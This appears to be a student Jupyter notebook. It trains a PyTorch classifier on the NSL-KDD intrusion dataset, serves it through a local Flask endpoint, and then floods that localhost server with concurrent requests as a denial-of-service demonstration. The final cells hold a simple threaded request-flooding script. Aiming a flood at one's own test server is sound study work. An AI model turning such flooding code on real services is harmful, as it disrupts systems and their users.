Do not run "Run All" to run the project. The DoS attack relies on having separate threads to host the server and run the attacks. Instead, manually run the pip install blocks, and from the block containing the imports, click on the imports block and in the top right of the block, run "Execute Cell and Below".

In [ ]:
%pip install flask

In [ ]:
%pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cu124

In [ ]:
%pip install pandas

In [ ]:
%pip install scikit-learn

In [ ]:
%pip install requests

The block below is where you may run "Execute Cell and Below" by clicking on the block below.

In [ ]:
from flask import Flask, request, jsonify
import torch
import torch.nn as nn
import pandas as pd
from sklearn.preprocessing import LabelEncoder, MinMaxScaler
from sklearn.model_selection import train_test_split
import torch.optim as optim
import threading
import time
from concurrent.futures import ThreadPoolExecutor
import requests
import time


In [ ]:
def loadData():
    trainData = pd.read_csv('datasets/KDDTrain+.txt', header=None)
    testData = pd.read_csv('datasets/KDDTest+.txt', header=None)

    train_features = trainData.iloc[:, :-1]
    train_labels = trainData.iloc[:, -1]

    test_features = testData.iloc[:, :-1]
    test_labels = testData.iloc[:, -1]

    categoryColumns = train_features.select_dtypes(include=['object']).columns.tolist()

    text_to_num_encoder = LabelEncoder()


    for c in categoryColumns:
        train_features[c] = text_to_num_encoder.fit_transform(train_features[c])
        test_features[c] = text_to_num_encoder.fit_transform(test_features[c])

    
    
    train_labels = text_to_num_encoder.fit_transform(train_labels)
    test_labels = text_to_num_encoder.fit_transform(test_labels)

 
    standardizer = MinMaxScaler()
    train_features = standardizer.fit_transform(train_features)
    test_features = standardizer.fit_transform(test_features)

    train_features = torch.tensor(train_features, dtype=torch.float32)
    train_labels = torch.tensor(train_labels, dtype=torch.float32)

    test_features = torch.tensor(test_features, dtype=torch.float32)
    test_labels = torch.tensor(test_labels, dtype=torch.float32)

    return train_features, train_labels, test_features, test_labels

    


In [ ]:
X_train, y_train, X_test, y_test = loadData()


In [ ]:
class flaskNN(nn.Module):
    def __init__(self):
        super(flaskNN, self).__init__()
        self.fc1 = nn.Linear(X_train.shape[1], 128)
        self.relu = nn.ReLU()
        self.dp = nn.Dropout(p=0.5)
        self.bn1 = nn.BatchNorm1d(128) 
        self.fc2 = nn.Linear(128, 64)
        self.fc3 = nn.Linear(64, len(torch.unique(y_train)))

    def forward(self, x):
        x = self.fc1(x)
        x = self.relu(x)
        x = self.bn1(x)
        x = self.dp(x)

        x = self.fc2(x)
        x = self.relu(x)
        
        x = self.fc3(x)
        return x




In [ ]:
def train(model, optimizer, criterion, X_train, y_train, batch_size = 128, device ='cuda', epochs=10):
    model.to(device)
    dataset = torch.utils.data.TensorDataset(X_train, y_train)
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)

    for ep in range(epochs):
        ep_loss = 0.0
        correct = 0
        total = 0
        model.train()


        for inputs, labels in dataloader:
            
            inputs, labels = inputs.to(device), labels.to(device)

            labels = labels.long()

            optimizer.zero_grad()
            outputs = model(inputs)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            
            ep_loss += loss.item()


            _, predicted = torch.max(outputs, 1)
            correct += (predicted == labels).sum().item()
            total += labels.size(0)
        
        acc = 100 * correct / total
        print(f"Epoch [{ep+1}/{epochs}], Loss: {ep_loss:.4f}, Accuracy: {acc:.2f}%")

def evaluate(model, X_test, y_test, batch_size=32, device='cuda'):
    model.to(device)
    model.eval()
    dataset = torch.utils.data.TensorDataset(X_test, y_test)
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False)
    
    correct = 0
    total = 0
    
    with torch.no_grad():
        for inputs, labels in dataloader:
            inputs, labels = inputs.to(device), labels.to(device)
            outputs = model(inputs)
            

            _, predicted = torch.max(outputs, 1)
            correct += (predicted == labels).sum().item()
            total += labels.size(0)
    
  
    test_accuracy = 100 * correct / total
    print(f"Test Accuracy: {test_accuracy:.2f}%")
    
    return test_accuracy


In [ ]:
# Uncomment if you would like to train the model yourself, however this is not necessary as a pre-trained model (Model/flaskNN.pth) exists.

# flaskModel = flaskNN().to('cuda')

# criterion = nn.CrossEntropyLoss()
# optimizer = optim.Adam(flaskModel.parameters(), lr=0.001)

# train(flaskModel, optimizer=optimizer, criterion=criterion, X_train=X_train, y_train=y_train, epochs = 20)
# torch.save(flaskModel, 'Model/flaskNN.pth')


In [ ]:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if torch.cuda.is_available():
        loadedModel = torch.load('Model/flaskNN.pth')
else:
        loadedModel = torch.load('Model/flaskNN.pth', map_location=torch.device(device))
        
evaluate(loadedModel, X_test=X_test, y_test=y_test, device=device)

In [ ]:
app = Flask(__name__)

model = loadedModel.to(device)
model.eval()

@app.route('/predict', methods=['POST'])
def predict():
    data = request.json['data']
    input = torch.tensor(data, dtype=torch.float32).to(device)

    with torch.no_grad():
        outputs = model(input)
        _, predictions = torch.max(outputs, 1)

        return jsonify({'predictions': predictions.cpu().tolist()})
    




In [ ]:
# Click on the link that is provided, it should give a 404. Attacks from the blocks below should update the log for this console.
# The result of the DOS attacks should be one of two things:
# 1) The attack is only semi-successful, and slows down inputs from the browser (refreshing sends another 404, if there is a delay, then there's a success)
# 2) The NN should crash, an exception should occur (you might need to view the log as "scrollable" at the bottom of the output and scroll up.)
#    The server should still receive inputs from the browser, but the neural network model for the server should be timed out (event log pipe is missing).
def runServer():
    app.run(debug=True, use_reloader=False)
serverThread = threading.Thread(target=runServer)
serverThread.start()


In [ ]:
input = [4.0268, 6.8709, 3.278, 4.2222, 2.0739, 7.557, 8.5444, 4.6199, 8.5978, 6.0871, 
 5.0458, -0.4034, 4.7607, 2.0641, 7.0293, 2.9484, 5.8933, 7.2381, 2.0542, 
 0.3832, 0.0443, 4.2011, 4.4006, 1.0722, 0.9632, 8.5004, 9.8459, 8.8029, 
 0.1164, 3.804, 1.8567, 9.5885, 1.8865, -0.1943, 2.5243, 7.5566, 5.5616, 
 5.2196, 9.4582, 5.6767, 8.5703, 0.78]

def sendJSONRequest(val=None):
    url = "http://127.0.0.1:5000/predict"
    request = {'data': [input]}
    response = requests.post(url, json=request)
    print(response.json())


In [ ]:
#So we have to use ThreadPoolExecutor to concurrently spam the server rather than sequentially. TPE is good because it can automatically deallocate resources
#once the attack is done, as opposed to above's threading.Thread(), since I want the server to persist.
def dos_attack(requestCount, threadCount):
    executor = ThreadPoolExecutor(max_workers=threadCount)
    start = time.time()
    results = list(executor.map(sendJSONRequest, range(requestCount)))
    end = time.time()
    executor.shutdown()
    print(f'Time elapsed: {end-start}')


In [ ]:
dos_attack(5000, 50) # This attack should take a long time (10+ minutes) to complete.
# Manually stop or re-open VS Code to kill it and its threads if the attack persists.